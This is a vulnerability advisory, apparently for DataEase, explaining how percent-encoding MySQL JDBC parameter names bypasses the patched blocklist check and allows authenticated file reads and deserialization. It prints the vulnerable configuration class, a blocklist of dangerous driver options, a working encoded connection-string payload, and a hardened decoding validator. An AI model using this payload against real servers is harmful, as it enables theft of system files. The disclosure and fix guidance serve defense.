Impact
Re-bypass for the patch for CVE-2024-55953.
Authenticated users can read and deserialize arbitrary files through the background JDBC connection.
The code in question is as follows (io.dataease.dto.datasource.MysqlConfiguration):
```java
package io.dataease.datasource.type;

import io.dataease.exception.DEException;
import io.dataease.extensions.datasource.vo.DatasourceConfiguration;
import lombok.Data;
import org.apache.commons.lang3.StringUtils;
import org.springframework.stereotype.Component;

import java.net.URLDecoder;
import java.util.Arrays;
import java.util.List;

@Data
@Component("mysql")
public class Mysql extends DatasourceConfiguration {
    private String driver = "com.mysql.cj.jdbc.Driver";
    private String extraParams = "characterEncoding=UTF-8&connectTimeout=5000&useSSL=false&allowPublicKeyRetrieval=true&zeroDateTimeBehavior=convertToNull";
    private List<String> illegalParameters =
            Arrays.asList("maxAllowedPacket", "autoDeserialize", "queryInterceptors",
                    "statementInterceptors", "detectCustomCollations", "allowloadlocalinfile", "allowUrlInLocalInfile", "allowLoadLocalInfileInPath");
    private List<String> showTableSqls = Arrays.asList("show tables");

    public String getJdbc() {
        if (StringUtils.isNoneEmpty(getUrlType()) && !getUrlType().equalsIgnoreCase("hostName")) {
            // Only the raw (still percent-encoded) URL is checked here; extraParams is decoded, the URL is not
            for (String illegalParameter : illegalParameters) {
                if (getJdbcUrl().toLowerCase().contains(illegalParameter.toLowerCase()) || URLDecoder.decode(getExtraParams()).contains(illegalParameter.toLowerCase())) {
                    DEException.throwException("Illegal parameter: " + illegalParameter);
                }
            }
            return getJdbcUrl();
        }
        if (StringUtils.isEmpty(extraParams.trim())) {
            return "jdbc:mysql://HOSTNAME:PORT/DATABASE"
                    .replace("HOSTNAME", getLHost().trim())
                    .replace("PORT", getLPort().toString().trim())
                    .replace("DATABASE", getDataBase().trim());
        } else {
            for (String illegalParameter : illegalParameters) {
                if (getExtraParams().toLowerCase().contains(illegalParameter.toLowerCase()) || URLDecoder.decode(getExtraParams()).contains(illegalParameter.toLowerCase())) {
                    DEException.throwException("Illegal parameter: " + illegalParameter);
                }
            }
            return "jdbc:mysql://HOSTNAME:PORT/DATABASE?EXTRA_PARAMS"
                    .replace("HOSTNAME", getLHost().trim())
                    .replace("PORT", getLPort().toString().trim())
                    .replace("DATABASE", getDataBase().trim())
                    .replace("EXTRA_PARAMS", getExtraParams().trim());
        }
    }
}
```
The JDBC URL returned by getJdbcUrl() is matched against the blocklist without being URL-decoded first, so percent-encoding the parameter names produces the following connection string, which passes the check:
jdbc:mysql://192.168.64.1:3306/?%61%6c%6c%6f%77%4c%6f%61%64%4c%6f%63%61%6c%49%6e%66%69%6c%65=true&%61%6c%6c%6f%77%55%72%6c%49%6e%4c%6f%63%61%6c%49%6e%66%69%6c%65=true
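As an added illustration (not DataEase's own code), a hardened version of the check that the vulnerable branch above lacks: it isolates the query string, percent-decodes each parameter name until it stops changing, normalizes case, and compares exact names against the advisory's blocklist. The class and method names here are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Locale;
import java.util.Set;

public final class JdbcUrlGuard {
    // The same parameter names the advisory's Mysql class blocks, lower-cased once here.
    static final Set<String> ILLEGAL = Set.of(
            "maxallowedpacket", "autodeserialize", "queryinterceptors", "statementinterceptors",
            "detectcustomcollations", "allowloadlocalinfile", "allowurlinlocalinfile",
            "allowloadlocalinfileinpath");

    /** Percent-decode until the value stops changing, so a double-encoded name (%2561...) is caught too. */
    static String fullyDecode(String s) {
        String prev;
        do {
            prev = s;
            s = URLDecoder.decode(s, StandardCharsets.UTF_8);
        } while (!s.equals(prev));
        return s;
    }

    /** Returns the first blocked parameter name in the URL's query (normalized), or null if none. */
    public static String findIllegalParameter(String jdbcUrl) {
        int q = jdbcUrl.indexOf('?');
        if (q < 0) {
            return null;
        }
        for (String pair : jdbcUrl.substring(q + 1).split("&")) {
            String key = pair.split("=", 2)[0];
            String normalized;
            try {
                normalized = fullyDecode(key).trim().toLowerCase(Locale.ROOT);
            } catch (IllegalArgumentException malformed) {
                return key; // undecodable escape: fail closed instead of letting the driver interpret it
            }
            if (ILLEGAL.contains(normalized)) {
                return normalized;
            }
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed samples: the advisory's percent-encoded URL and a benign one.
        String encoded = "jdbc:mysql://192.168.64.1:3306/?"
                + "%61%6c%6c%6f%77%4c%6f%61%64%4c%6f%63%61%6c%49%6e%66%69%6c%65=true";
        String plain = "jdbc:mysql://192.168.64.1:3306/db?useSSL=false&connectTimeout=5000";
        System.out.println("encoded -> " + findIllegalParameter(encoded));
        System.out.println("plain   -> " + findIllegalParameter(plain));
    }
}
```

A decoded, exact-name comparison closes this particular bypass, but any blocklist on a user-controlled JDBC URL remains fragile; the stronger control is to refuse free-form URLs and accept only host, port, database and an allowlisted set of options.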
After logging in, send the following request.

It can be seen in the source code that the check is bypassed.

Using the tool, /etc/passwd was read successfully.
Affected versions: <= 2.10.5
Patches
The vulnerability has been fixed in v2.10.6.
Workarounds
It is recommended to upgrade the version to v2.10.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]